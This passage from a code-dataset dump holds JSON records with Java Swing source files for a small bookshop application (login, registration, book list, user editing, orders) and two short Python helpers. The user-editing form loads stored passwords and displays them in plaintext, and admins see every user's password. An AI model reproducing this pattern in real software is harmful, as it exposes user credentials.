MODIFY //GEN-BEGIN:initComponents\n loginLabelTitle = new JLabel();\n loginLabelName = new JLabel();\n loginTextField = new JTextField();\n loginLabelPassword = new JLabel();\n loginPasswordField = new JPasswordField();\n loginButtonUser = new JButton();\n loginButtonAdmin = new JButton();\n loginButtonRegister = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //---- loginLabelTitle ----\n loginLabelTitle.setText(\"\\u7528\\u6237\\u767b\\u5f55\\u754c\\u9762\");\n loginLabelTitle.setFont(loginLabelTitle.getFont().deriveFont(loginLabelTitle.getFont().getStyle() | Font.ITALIC, loginLabelTitle.getFont().getSize() + 20f));\n loginLabelTitle.setHorizontalAlignment(SwingConstants.CENTER);\n contentPane.add(loginLabelTitle);\n loginLabelTitle.setBounds(130, 10, 255, loginLabelTitle.getPreferredSize().height);\n\n //---- loginLabelName ----\n loginLabelName.setText(\"\\u7528\\u6237\\u540d\");\n loginLabelName.setFont(loginLabelName.getFont().deriveFont(loginLabelName.getFont().getSize() + 6f));\n contentPane.add(loginLabelName);\n loginLabelName.setBounds(90, 85, 55, 22);\n contentPane.add(loginTextField);\n loginTextField.setBounds(165, 85, 230, loginTextField.getPreferredSize().height);\n\n //---- loginLabelPassword ----\n loginLabelPassword.setText(\"\\u5bc6 \\u7801\");\n loginLabelPassword.setFont(loginLabelPassword.getFont().deriveFont(loginLabelPassword.getFont().getSize() + 6f));\n contentPane.add(loginLabelPassword);\n loginLabelPassword.setBounds(new Rectangle(new Point(90, 160), loginLabelPassword.getPreferredSize()));\n contentPane.add(loginPasswordField);\n loginPasswordField.setBounds(160, 160, 230, loginPasswordField.getPreferredSize().height);\n\n //---- loginButtonUser ----\n loginButtonUser.setText(\"\\u7528\\u6237\\u767b\\u5f55\");\n loginButtonUser.addActionListener(e -> loginButtonUserActionPerformed(e));\n contentPane.add(loginButtonUser);\n loginButtonUser.setBounds(new Rectangle(new Point(85, 225), loginButtonUser.getPreferredSize()));\n\n //---- loginButtonAdmin ----\n loginButtonAdmin.setText(\"\\u7ba1\\u7406\\u5458\\u767b\\u5f55\");\n loginButtonAdmin.addActionListener(e -> loginButtonAdminActionPerformed(e));\n contentPane.add(loginButtonAdmin);\n loginButtonAdmin.setBounds(210, 225, 100, 30);\n\n //---- loginButtonRegister ----\n loginButtonRegister.setText(\"\\u6ce8\\u518c\");\n loginButtonRegister.addActionListener(e -> loginButtonRegisterActionPerformed(e));\n contentPane.add(loginButtonRegister);\n loginButtonRegister.setBounds(345, 225, 100, 30);\n\n { // compute preferred size\n Dimension preferredSize = new Dimension();\n for(int i = 0; i < contentPane.getComponentCount(); i++) {\n Rectangle bounds = contentPane.getComponent(i).getBounds();\n preferredSize.width = Math.max(bounds.x + bounds.width, preferredSize.width);\n preferredSize.height = Math.max(bounds.y + bounds.height, preferredSize.height);\n }\n Insets insets = contentPane.getInsets();\n preferredSize.width += insets.right;\n preferredSize.height += insets.bottom;\n contentPane.setMinimumSize(preferredSize);\n contentPane.setPreferredSize(preferredSize);\n }\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JLabel loginLabelTitle;\n private JLabel loginLabelName;\n private JTextField loginTextField;\n private JLabel loginLabelPassword;\n private JPasswordField loginPasswordField;\n private JButton loginButtonUser;\n private JButton loginButtonAdmin;\n private JButton loginButtonRegister;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5250825881958008,
"alphanum_fraction": 0.5587356686592102,
"avg_line_length": 34.7247200012207,
"blob_id": "830d1c7a0db7f2f7141cff5a0c396099e94d975d",
"content_id": "5893816c0f6914efff9cf257a11ba519e00af3e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6421,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 178,
"path": "/src/com/bookshop/ui/userForm/BookListForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Wed Jul 08 21:48:28 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\nimport com.bookshop.entity.Book;\nimport com.bookshop.entity.BookList;\nimport com.bookshop.service.impl.BookListServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class BookListForm extends JFrame {\n public static void main(String[] args) {\n BookListForm bookListForm = new BookListForm();\n bookListForm.setVisible(true);\n }\n BookListServiceImpl bookListService=new BookListServiceImpl();\n public BookListForm() {\n initComponents();\n if(\"user\".equals(UserData.Sign)){\n button3.setVisible(false);\n }\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 刷新\n showData();\n }\n\n private void button2ActionPerformed(ActionEvent e) {\n // TODO add your code here\n showData();\n// String name = textField1.getText().trim();\n// JythonTest.main1(name);\n// JOptionPane.showMessageDialog(null, \"提示:数据获取成功,请刷新\");\n }\n\n private void button3ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 插入\n String name = textField1.getText().trim();\n JythonTest.main1(name);\n JOptionPane.showMessageDialog(null, \"提示:数据获取成功,请刷新\");\n }\n\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n scrollPane1 = new JScrollPane();\n table1 = new JTable();\n button1 = new JButton();\n textField1 = new JTextField();\n button2 = new JButton();\n button3 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== scrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][] {\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null},\n },\n new String[] {\n \"ID\", \"\\u4e66\\u540d\", \"\\u94fe\\u63a5\", \"\\u51fa\\u7248\\u793e\", \"\\u8bc4\\u5206\", \"\\u8bc4\\u8bba\\u6570\\u91cf\", \"\\u7b80\\u4ecb\"\n }\n ) {\n boolean[] columnEditable = new boolean[] {\n false, false, false, false, false, false, false\n };\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n scrollPane1.setViewportView(table1);\n }\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(15, 30, 690, 355);\n\n //---- button1 ----\n button1.setText(\"\\u5237\\u65b0\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(70, 395), button1.getPreferredSize()));\n contentPane.add(textField1);\n textField1.setBounds(265, 400, 95, textField1.getPreferredSize().height);\n\n //---- button2 ----\n button2.setText(\"\\u67e5\\u8be2\");\n button2.addActionListener(e -> button2ActionPerformed(e));\n contentPane.add(button2);\n button2.setBounds(new Rectangle(new Point(400, 400), button2.getPreferredSize()));\n\n //---- button3 ----\n button3.setText(\"\\u63d2\\u5165\");\n button3.addActionListener(e -> button3ActionPerformed(e));\n contentPane.add(button3);\n button3.setBounds(new Rectangle(new Point(180, 400), button3.getPreferredSize()));\n\n contentPane.setPreferredSize(new Dimension(720, 470));\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n private String[][] select() {\n List<BookList> bookLists;\n bookLists = bookListService.queryByName(textField1.getText().trim());\n \n String[][] datas = new String[bookLists.size()][6];\n for (int i = 0; i < datas.length; i++) {\n datas[i][0] = bookLists.get(i).getName();\n datas[i][1] = bookLists.get(i).getLink();\n datas[i][2] = bookLists.get(i).getPublicer().toString();\n datas[i][3] = bookLists.get(i).getGrade();\n datas[i][4] = bookLists.get(i).getNum();\n datas[i][5] = bookLists.get(i).getContent().toString();\n \n\n }\n return datas;\n }\n public void showData(){\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n select(),\n new String[] {\n \"\\u4e66\\u540d\", \"\\u94fe\\u63a5\", \"\\u51fa\\u7248\\u793e\", \"\\u8bc4\\u5206\", \"\\u8bc4\\u8bba\\u6570\\u91cf\", \"\\u7b80\\u4ecb\"\n }\n ) {\n boolean[] columnEditable = new boolean[] {\n false, false, false, false, false, false\n };\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n\n scrollPane1.setViewportView(table1);\n\n }\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane scrollPane1;\n private JTable table1;\n private JButton button1;\n private JTextField textField1;\n private JButton button2;\n private JButton button3;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.6693548560142517,
"alphanum_fraction": 0.6693548560142517,
"avg_line_length": 29.75,
"blob_id": "e531fad2f16d84ef4e297d4c1bdd8741b24e5c1a",
"content_id": "d6f3d52a16efc67b34df31176f4a1dfdedbe0c58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 4,
"path": "/charrobot/DEMO01/CS1/sub.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import jieba, jieba.analyse\ndef fc(str_text):\n keywords_top = jieba.lcut(str_text)\n return ( \"/\".join(keywords_top))\n\n"
},
{
"alpha_fraction": 0.5767272710800171,
"alphanum_fraction": 0.6287999749183655,
"avg_line_length": 36.364131927490234,
"blob_id": "39f13c9250b233c06183d0ff173e4c1ae28284b4",
"content_id": "7f7bdc4e523e5d25da25c80587ebbbcfe09986b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6889,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 184,
"path": "/src/com/bookshop/ui/userForm/UserRegisterFrame.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Fri Jul 03 10:59:02 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\n\nimport com.bookshop.entity.User;\nimport com.bookshop.service.impl.UserServiceImpl;\nimport com.bookshop.ui.publicForm.LoginFrame;\nimport com.bookshop.util.JRichTextField;\n\nimport java.awt.*;\nimport javax.swing.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class UserRegisterFrame extends JFrame {\n public static void main(String[] args) {\n UserRegisterFrame userRegisterFrame = new UserRegisterFrame();\n userRegisterFrame.setVisible(true);\n }\n public UserRegisterFrame() {\n initComponents();\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n String loginName = textField1.getText();\n String pws = textField2.getText();\n String name = textField3.getText();\n String email = textField4.getText();\n String tel = textField5.getText();\n String addr = textField6.getText();\n String sex = comboBox1.getSelectedItem().toString();\n\n\n User user = new User(loginName,pws,name,sex,email,tel,addr);\n UserServiceImpl userService = new UserServiceImpl();\n int insert = userService.insert(user);\n if (insert>0){\n JOptionPane.showMessageDialog(null, \"注册成功\");\n this.setVisible(false);\n LoginFrame loginFrame = new LoginFrame();\n loginFrame.setVisible(true);\n }\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n label1 = new JLabel();\n label2 = new JLabel();\n label3 = new JLabel();\n label4 = new JLabel();\n label5 = new JLabel();\n label6 = new JLabel();\n label7 = new JLabel();\n label8 = new JLabel();\n textField1 = new JTextField();\n textField2 = new JTextField();\n textField3 = new JTextField();\n comboBox1 = new JComboBox<>();\n textField4 = new JTextField();\n textField5 = new JTextField();\n textField6 = new JTextField();\n checkBox1 = new JCheckBox();\n button1 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //---- label1 ----\n label1.setText(\"\\u7528\\u6237\\u540d\");\n contentPane.add(label1);\n label1.setBounds(20, 100, 50, label1.getPreferredSize().height);\n\n //---- label2 ----\n label2.setText(\"\\u5bc6\\u7801\");\n contentPane.add(label2);\n label2.setBounds(20, 145, 55, label2.getPreferredSize().height);\n\n //---- label3 ----\n label3.setText(\"\\u6635\\u79f0\");\n contentPane.add(label3);\n label3.setBounds(20, 190, label3.getPreferredSize().width, 20);\n\n //---- label4 ----\n label4.setText(\"\\u6027\\u522b\");\n contentPane.add(label4);\n label4.setBounds(new Rectangle(new Point(20, 245), label4.getPreferredSize()));\n\n //---- label5 ----\n label5.setText(\"\\u90ae\\u7bb1\");\n contentPane.add(label5);\n label5.setBounds(new Rectangle(new Point(20, 290), label5.getPreferredSize()));\n\n //---- label6 ----\n label6.setText(\"\\u7535\\u8bdd\");\n contentPane.add(label6);\n label6.setBounds(20, 335, 30, 25);\n\n //---- label7 ----\n label7.setText(\"\\u5730\\u5740\");\n contentPane.add(label7);\n label7.setBounds(new Rectangle(new Point(20, 390), label7.getPreferredSize()));\n\n //---- label8 ----\n label8.setText(\"\\u7528\\u6237\\u6ce8\\u518c\");\n label8.setFont(label8.getFont().deriveFont(label8.getFont().getSize() + 15f));\n contentPane.add(label8);\n label8.setBounds(new Rectangle(new Point(155, 30), label8.getPreferredSize()));\n contentPane.add(textField1);\n textField1.setBounds(80, 95, 135, textField1.getPreferredSize().height);\n contentPane.add(textField2);\n textField2.setBounds(80, 140, 135, textField2.getPreferredSize().height);\n contentPane.add(textField3);\n textField3.setBounds(75, 190, 140, textField3.getPreferredSize().height);\n\n //---- comboBox1 ----\n comboBox1.setModel(new DefaultComboBoxModel<>(new String[] {\n \"\\u65e0\",\n \"\\u7537\",\n \"\\u5973\"\n }));\n contentPane.add(comboBox1);\n comboBox1.setBounds(75, 230, 145, comboBox1.getPreferredSize().height);\n contentPane.add(textField4);\n textField4.setBounds(75, 290, 140, textField4.getPreferredSize().height);\n contentPane.add(textField5);\n textField5.setBounds(75, 340, 145, textField5.getPreferredSize().height);\n contentPane.add(textField6);\n textField6.setBounds(70, 395, 150, textField6.getPreferredSize().height);\n\n //---- checkBox1 ----\n checkBox1.setText(\"\\u6211\\u5df2\\u540c\\u610f\\u76f8\\u5173\\u534f\\u8bae\");\n contentPane.add(checkBox1);\n checkBox1.setBounds(new Rectangle(new Point(40, 440), checkBox1.getPreferredSize()));\n\n //---- button1 ----\n button1.setText(\"\\u7acb\\u5373\\u6ce8\\u518c\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(65, 475, 275, button1.getPreferredSize().height);\n\n { // compute preferred size\n Dimension preferredSize = new Dimension();\n for(int i = 0; i < contentPane.getComponentCount(); i++) {\n Rectangle bounds = contentPane.getComponent(i).getBounds();\n preferredSize.width = Math.max(bounds.x + bounds.width, preferredSize.width);\n preferredSize.height = Math.max(bounds.y + bounds.height, preferredSize.height);\n }\n Insets insets = contentPane.getInsets();\n preferredSize.width += insets.right;\n preferredSize.height += insets.bottom;\n contentPane.setMinimumSize(preferredSize);\n contentPane.setPreferredSize(preferredSize);\n }\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JLabel label1;\n private JLabel label2;\n private JLabel label3;\n private JLabel label4;\n private JLabel label5;\n private JLabel label6;\n private JLabel label7;\n private JLabel label8;\n private JTextField textField1;\n private JTextField textField2;\n private JTextField textField3;\n private JComboBox<String> comboBox1;\n private JTextField textField4;\n private JTextField textField5;\n private JTextField textField6;\n private JCheckBox checkBox1;\n private JButton button1;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.679347813129425,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 25.285715103149414,
"blob_id": "f5034fdd95ac22113fccfbd2de15d97ce3a2ecaa",
"content_id": "c4f500c970f8df3859c31c7878294a8bf9b25eca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 7,
"path": "/charrobot/DEMO01/CS1/tel.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import requests\nimport json\n\n\ndef telSelect(city):\n res = requests.get(\"http://api.63code.com/tel/api.php?tel=\" + city).text.encode('utf-8').decode('unicode_escape')\n return res\n"
},
{
"alpha_fraction": 0.46428218483924866,
"alphanum_fraction": 0.48832398653030396,
"avg_line_length": 38.490272521972656,
"blob_id": "4ccce31f49233a5e2c6af1908db97fe0dfa06638",
"content_id": "c0b260ff956e5cfd8d59365bb9605b8e854b41e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 10725,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 257,
"path": "/src/com/bookshop/ui/userForm/UserUpdateForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Sun Jul 05 13:48:53 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\n\nimport com.bookshop.entity.Cart;\nimport com.bookshop.entity.User;\nimport com.bookshop.service.impl.UserServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °???°?\n */\npublic class UserUpdateForm extends JFrame {\n private UserServiceImpl userService = new UserServiceImpl();\n\n public UserUpdateForm() {\n initComponents();\n click();\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 修改用户\n int lev = 0, id;\n String loginName, password, name = \"未设置\", sex = \"未设置\", email = \"未设置\", tel = \"未设置\", address = \"未设置\";\n int index = table1.getSelectedRow();\n TableModel model = table1.getModel();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n id = Integer.parseInt(model.getValueAt(index, 0).toString());\n loginName = model.getValueAt(index, 1).toString();\n password = model.getValueAt(index, 2).toString();\n try {\n // 取得表格对象的数据模型\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n name = model.getValueAt(index, 3).toString();\n sex = model.getValueAt(index, 4).toString();\n email = model.getValueAt(index, 5).toString();\n tel = model.getValueAt(index, 6).toString();\n address = model.getValueAt(index, 7).toString();\n if (\"user\".equals(UserData.Sign)) {\n lev = userService.queryById(id).getLevel();\n } else {\n lev = Integer.parseInt(model.getValueAt(index, 8).toString());\n }\n } catch (Exception es) {\n JOptionPane.showMessageDialog(null, \"提示:有选项没填,已经设置为默认值\");\n }\n// \"ID\", \"登录名\", \"密码\", \"昵称\", \"性别\", \"邮箱\", \"电话\", \"地址\"\n User user = new User(id, loginName, password, name, sex, email, tel, address, lev);\n if (userService.update(user) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:\" + user.getLoginName() + \"修改成功!\");\n click();\n } else {\n JOptionPane.showMessageDialog(null, \"提示:修改失败!\");\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择需要修改的用户!\");\n }\n\n }\n\n private void button2ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 注销用户,体现在lev的修改\n int lev = 0, id;\n String loginName, password, name = \"未设置\", sex = \"未设置\", email = \"未设置\", tel = \"未设置\", address = \"未设置\";\n int index = table1.getSelectedRow();\n TableModel model = table1.getModel();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n id = Integer.parseInt(model.getValueAt(index, 0).toString());\n loginName = model.getValueAt(index, 1).toString();\n password = model.getValueAt(index, 2).toString();\n try {\n // 取得表格对象的数据模型\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n name = model.getValueAt(index, 3).toString();\n sex = model.getValueAt(index, 4).toString();\n email = model.getValueAt(index, 5).toString();\n tel = model.getValueAt(index, 6).toString();\n address = model.getValueAt(index, 7).toString();\n lev = -1;\n\n } catch (Exception es) {\n JOptionPane.showMessageDialog(null, \"提示:有选项没填,已经设置为默认值\");\n }\n// \"ID\", \"登录名\", \"密码\", \"昵称\", \"性别\", \"邮箱\", \"电话\", \"地址\"\n User user = new User(id, loginName, password, name, sex, email, tel, address, lev);\n if (userService.update(user) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:\" + user.getLoginName() + \"注销成功!\");\n// click();\n System.exit(0);\n } else {\n JOptionPane.showMessageDialog(null, \"提示:注销失败!\");\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择需要注销的用户!\");\n }\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n scrollPane1 = new JScrollPane();\n table1 = new JTable();\n button1 = new JButton();\n button2 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== scrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][]{\n {null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null},\n },\n new String[]{\n \"ID\", \"\\u767b\\u5f55\\u540d\", \"\\u5bc6\\u7801\", \"\\u6635\\u79f0\", \"\\u6027\\u522b\", \"\\u90ae\\u7bb1\", \"\\u7535\\u8bdd\", \"\\u5730\\u5740\"\n }\n ) {\n boolean[] columnEditable = new boolean[]{\n false, false, true, true, true, true, true, true\n };\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n scrollPane1.setViewportView(table1);\n }\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(20, 40, 710, 465);\n\n //---- button1 ----\n button1.setText(\"\\u4fee\\u6539\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(105, 520), button1.getPreferredSize()));\n\n //---- button2 ----\n button2.setText(\"\\u6ce8\\u9500\");\n button2.addActionListener(e -> button2ActionPerformed(e));\n contentPane.add(button2);\n button2.setBounds(new Rectangle(new Point(575, 525), button2.getPreferredSize()));\n\n contentPane.setPreferredSize(new Dimension(770, 595));\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n public void click() {\n //---- table1 ----\n if (\"user\".equals(UserData.Sign)) {\n table1.setModel(new DefaultTableModel(\n select(),\n new String[]{\n \"ID\", \"登录名\", \"密码\", \"昵称\", \"性别\", \"邮箱\", \"电话\", \"地址\"\n }\n )\n {\n boolean[] columnEditable = new boolean[]{\n false, false, true, true, true, true, true, true\n };\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n }\n );\n scrollPane1.setViewportView(table1);\n } else {\n table1.setModel(new DefaultTableModel(\n select(),\n new String[]{\n \"ID\", \"\\u767b\\u5f55\\u540d\", \"\\u5bc6\\u7801\", \"\\u6635\\u79f0\", \"\\u6027\\u522b\", \"\\u90ae\\u7bb1\", \"\\u7535\\u8bdd\", \"\\u5730\\u5740\", \"等级\"\n }\n ) {\n boolean[] columnEditable = new boolean[]{\n false, false, true, true, true, true, true, true\n };\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n }\n );\n scrollPane1.setViewportView(table1);\n button2.setVisible(false);\n }\n\n\n }\n\n private String[][] select() {\n String[][] datas;\n if (\"user\".equals(UserData.Sign)) {\n User user = userService.queryById(UserData.userId);\n datas = new String[1][8];\n if (user.getLevel() == -1) {\n return new String[][]{\n {null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null},\n };\n }\n datas[0][0] = user.getId().toString();\n datas[0][1] = user.getLoginName();\n datas[0][2] = user.getPassword();\n datas[0][3] = user.getName();\n datas[0][4] = user.getSex();\n datas[0][5] = user.getEmail();\n datas[0][6] = user.getTel();\n datas[0][7] = user.getAddress();\n\n } else {\n List<User> users = userService.queryAll();\n datas = new String[users.size()][9];\n for (int i = 0; i < datas.length; i++) {\n datas[i][0] = users.get(i).getId().toString();\n datas[i][1] = users.get(i).getLoginName();\n datas[i][2] = users.get(i).getPassword();\n datas[i][3] = users.get(i).getName();\n datas[i][4] = users.get(i).getSex();\n datas[i][5] = users.get(i).getEmail();\n datas[i][6] = users.get(i).getTel();\n datas[i][7] = users.get(i).getAddress();\n datas[i][8] = users.get(i).getLevel().toString();\n }\n }\n //---- table1 ---\n return datas;\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane scrollPane1;\n private JTable table1;\n private JButton button1;\n private JButton button2;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5373939871788025,
"alphanum_fraction": 0.5541359186172485,
"avg_line_length": 35.60887145996094,
"blob_id": "59a5e287b3b6df75aad8b33a40bca4f6316890ac",
"content_id": "a004e2985ea01e5b3bc0fc225c4ed44e2e5d5d35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9513,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 248,
"path": "/src/com/bookshop/ui/userForm/OrderForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Fri Jul 03 12:25:52 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\n\nimport com.bookshop.entity.Book;\nimport com.bookshop.entity.Cart;\nimport com.bookshop.entity.Order;\nimport com.bookshop.entity.OrderItem;\nimport com.bookshop.service.impl.BookServiceImpl;\nimport com.bookshop.service.impl.CartServiceImpl;\nimport com.bookshop.service.impl.OrderItemServiceImpl;\nimport com.bookshop.service.impl.OrderServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.util.ArrayList;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class OrderForm extends JFrame {\n public static void main(String[] args) {\n OrderForm orderForm = new OrderForm();\n orderForm.setVisible(true);\n\n }\n\n int last_id;\n\n\n OrderServiceImpl orderService = new OrderServiceImpl();\n Order order = new Order();\n int userId = UserData.userId;\n CartServiceImpl cartService = new CartServiceImpl();\n//显示订单数据函数\n public void click() {\n orderTable.setModel(new DefaultTableModel(\n UserData.arr,\n new String[]{\n \"ID\", \"bookID\", \"\\u56fe\\u4e66\\u540d\\u79f0\", \"\\u56fe\\u4e66\\u4ef7\\u683c\", \"\\u56fe\\u4e66\\u6570\\u91cf\", \"\\u56fe\\u4e66\\u603b\\u4ef7\\u683c\",\"状态\"\n }\n ) {\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return false;\n }\n });\n scrollPane1.setViewportView(orderTable);\n\n\n }\n//把订单信息保存到用户缓存中\n private String[][] select() {\n\n// List<Order> orders = orderService.queryAll();\n\n String[][] datas = UserData.arr;\n //---- table1 ---\n return datas;\n }\n\n public OrderForm() {\n initComponents();\n click();\n }\n\n //提交订单\n private void button1ActionPerformed(ActionEvent e) {\n\n\n // int index = table1.getSelectedRow();\n // 如果下标不为-1,则选中行为数据行\n int[] selectedRows = orderTable.getSelectedRows();\n double priceSums = 0.0;\n int remainder=0;\n Book book1=null;\n BookServiceImpl bookService=null;\n OrderItemServiceImpl orderItemService = new OrderItemServiceImpl();\n// 获取表格多行内容\n if (selectedRows.length > 0) {\n for (int index = 0; index < selectedRows.length; index++) {\n // 取得表格对象的数据模型\n TableModel model = orderTable.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n int booknum=Integer.parseInt(model.getValueAt(index, 4).toString());\n Integer bookId = Integer.parseInt(model.getValueAt(index, 1).toString());\n\n priceSums = priceSums + Double.parseDouble(model.getValueAt(index, 5).toString());\n Integer statu = Integer.parseInt(model.getValueAt(index, 6).toString());\n bookService= new BookServiceImpl();\n book1 = bookService.queryById(bookId);\n remainder = book1.getStore() - booknum;\n book1.setStore( book1.getStore()-booknum);\n// 订单状态判断\n if(remainder<0||statu!=1){\n JOptionPane.showMessageDialog(null, \"提示:订单项创建失败,可能库存不足够或者商品下架\");\n return;\n }\n }\n OrderServiceImpl orderService = new OrderServiceImpl();\n UserData.lastpricesum=priceSums;\n Order order = new Order(userId, priceSums, 1);\n// 插入订单\n last_id = orderService.insert(order);\n\n\n }\n if (last_id > 0) {\n// 插入订单现\n if (selectedRows.length > 0) {\n for (int index = 0; index < selectedRows.length; index++) {\n // 取得表格对象的数据模型\n TableModel model = orderTable.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n int booknum=Integer.parseInt(model.getValueAt(index, 4).toString());\n double priceSum = Double.parseDouble(model.getValueAt(index, 5).toString());\n Integer bookId = Integer.parseInt(model.getValueAt(index, 1).toString());\n// Integer userId, Integer bookId, Integer orderId, Double priceSum\n OrderItem orderItem = new OrderItem(userId,bookId,last_id,priceSum);\n if (orderItemService.insert(orderItem)>0&&remainder>=0){\n bookService.update(book1);\n JOptionPane.showMessageDialog(null, \"提示:订单项创建成功\");\n }else {\n JOptionPane.showMessageDialog(null, \"提示:订单项创建失败,可能库存不足够\");\n }\n\n\n }\n\n JOptionPane.showMessageDialog(null, \"提示:订单创建成功\");\n this.setVisible(false);\n UserData.arr = new String[][]{\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n };\n click();\n PayForm payForm = new 